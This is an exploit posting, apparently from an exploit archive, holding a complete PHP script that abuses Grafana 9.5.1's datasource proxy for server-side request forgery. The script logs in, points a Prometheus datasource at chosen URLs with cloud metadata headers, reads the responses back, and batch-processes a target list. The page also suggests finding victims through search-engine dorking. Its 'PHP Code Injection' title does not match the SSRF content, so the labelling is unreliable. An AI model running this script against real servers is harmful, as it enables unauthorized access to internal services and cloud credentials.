Share
## https://sploitus.com/exploit?id=PACKETSTORM:189538
=============================================================================================================================================
| # Title : Grafana 9.5.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://grafana.com/grafana/download/9.5.1 |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description:
It is mainly used as an SSRF (Server-Side Request Forgery) attack against Grafana, an open source data analytics application used to display charts and monitored data. Here are the main uses
[+] save code as poc.php .
[+] Set Targrt : line = 225 + 226 + 227
[+] USage : php poc.php
[+] PayLoad :
<?php
// إعدادات الاتصال بـ cURL
function send_post_request($url, $data, $headers, $cookies) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
if ($data) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // إيقاف التحقق من الشهادات
$response = curl_exec($ch);
$status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return [
'status_code' => $status_code,
'body' => $response
];
}
// إنشاء مصدر Grafana
function create_source($sessionid, $ssrf_url, $ghost) {
$rawBody = json_encode([
"name" => "SSRF-TESTING",
"type" => "prometheus",
"access" => "proxy",
"isDefault" => false
]);
$headers = [
"Origin: " . $ghost,
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/new",
"Connection: close",
"x-grafana-org-id: 1",
"content-type: application/json",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources";
$response = send_post_request($url, $rawBody, $headers, $cookies);
if ($response['status_code'] == 200) {
$data = json_decode($response['body'], true);
if (isset($data['id'])) {
echo "Source Created\n";
return $data['id'];
} else {
echo "Error: " . $response['body'] . "\n";
}
} else {
echo "Error:\n";
echo "Status code: " . $response['status_code'] . "\n";
echo $response['body'] . "\n";
}
}
// تحديث مصدر Grafana
function refresh_source($ghost, $sessionid, $id) {
$headers = [
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/edit/6/",
"Connection: close",
"x-grafana-org-id: 1",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources/" . $id;
$response = send_post_request($url, null, $headers, $cookies);
if ($response['status_code'] == 200) {
echo "Refreshed Sources\n";
} else {
echo "Error:\n";
echo "Status code: " . $response['status_code'] . "\n";
echo $response['body'] . "\n";
}
}
// إنشاء SSRF في Grafana
function create_ssrf($sessionid, $ssrf_url, $ghost, $id) {
$rawBody = json_encode([
"id" => $id,
"orgId" => 1,
"name" => "SSRF-TESTING",
"type" => "prometheus",
"access" => "proxy",
"url" => $ssrf_url,
"password" => "test",
"user" => "test",
"database" => "test",
"basicAuth" => false,
"withCredentials" => false,
"isDefault" => false,
"jsonData" => [
"tlsSkipVerify" => true,
"httpHeaderName1" => "Metadata-Flavor",
"httpHeaderName2" => "Metadata",
"httpMethod" => "GET"
],
"secureJsonData" => [
"httpHeaderValue1" => "Google",
"httpHeaderValue2" => "true"
],
"version" => 1,
"readOnly" => false
]);
$headers = [
"Origin: " . $ghost,
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/edit/6/",
"Connection: close",
"x-grafana-org-id: 1",
"content-type: application/json",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources/" . $id;
$response = send_post_request($url, $rawBody, $headers, $cookies);
if ($response['status_code'] == 200) {
echo "SSRF Source Updated\n";
} else {
echo "Error:\n";
echo "Status code: " . $response['status_code'] . "\n";
echo $response['body'] . "\n";
}
}
// فحص Grafana SSRF
function check_ssrf($sessionid, $id, $ghost, $ssrf_url) {
$headers = [
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/edit/" . $id . "/",
"Connection: close",
"x-grafana-org-id: 1",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate",
"x-grafana-nocache" => "true"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources/proxy/" . $id . "/";
$response = send_post_request($url, null, $headers, $cookies);
if ($response['status_code'] != 502) {
echo "Status code: " . $response['status_code'] . "\n";
echo "Response body:\n" . $response['body'] . "\n";
$gghost = parse_url($ghost, PHP_URL_HOST);
$sub_addr = explode('.', $gghost)[0];
file_put_contents($sub_addr . ".txt", "SSRF URL: " . $ssrf_url . "\nStatus code: " . $response['status_code'] . "\nResponse body: " . $response['body'] . "\n\n", FILE_APPEND);
} else {
echo "Error:\n";
echo $response['body'] . "\n";
}
}
// حذف مصدر Grafana
function delete_source($sessionid, $id, $ghost) {
$headers = [
"Origin: " . $ghost,
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/datasources/edit/3/",
"Connection: close",
"x-grafana-org-id: 1",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "grafana_session=" . $sessionid;
$url = $ghost . "/api/datasources/" . $id;
$response = send_post_request($url, null, $headers, $cookies);
if (strpos($response['body'], "Data source deleted") !== false) {
echo "Deleted Old SSRF Source\n";
} else {
echo "Error:\n";
echo $response['body'] . "\n";
exit(0);
}
}
// تسجيل الدخول إلى Grafana
function login($ghost, $username, $password) {
$rawBody = json_encode(["user" => $username, "password" => $password, "email" => ""]);
$headers = [
"Origin: " . $ghost,
"Accept: application/json, text/plain, */*",
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
"Referer: " . $ghost . "/signup",
"Connection: close",
"content-type: application/json",
"Accept-Language: en-US,en;q=0.5",
"Accept-Encoding: gzip, deflate"
];
$cookies = "redirect_to=%2F";
$url = $ghost . "/login";
$response = send_post_request($url, $rawBody, $headers, $cookies);
$data = json_decode($response['body'], true);
if (isset($data['grafana_session'])) {
return $data['grafana_session'];
} elseif (isset($data['grafana_sess'])) {
return $data['grafana_sess'];
} else {
echo "Login Session Cookie not set\n";
exit(0);
}
}
// منطق التنفيذ الرئيسي
$username = 'username'; // أدخل اسم المستخدم هنا
$password = 'password'; // أدخل كلمة المرور هنا
$ghost = 'http://example.com'; // أدخل رابط Grafana هنا
$ssrf_url = 'http://ssrf-target.com'; // أدخل URL هدف SSRF هنا
$files = 'ssrf_urls.txt'; // الملف الذي يحتوي على URLs إذا كان موجودًا
if ($username) {
$sessionid = login($ghost, $username, $password);
}
if ($ssrf_url) {
$id = create_source($sessionid, $ssrf_url, $ghost);
refresh_source($ghost, $sessionid, $id);
create_ssrf($sessionid, $ssrf_url, $ghost, $id);
check_ssrf($sessionid, $id, $ghost, $ssrf_url);
}
if ($files) {
if (file_exists($files)) {
$lines = file($files, FILE_IGNORE_NEW_LINES);
foreach ($lines as $ssrf_url) {
$id = create_source($sessionid, $ssrf_url, $ghost);
refresh_source($ghost, $sessionid, $id);
create_ssrf($sessionid, $ssrf_url, $ghost, $id);
check_ssrf($sessionid, $id, $ghost, $ssrf_url);
}
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================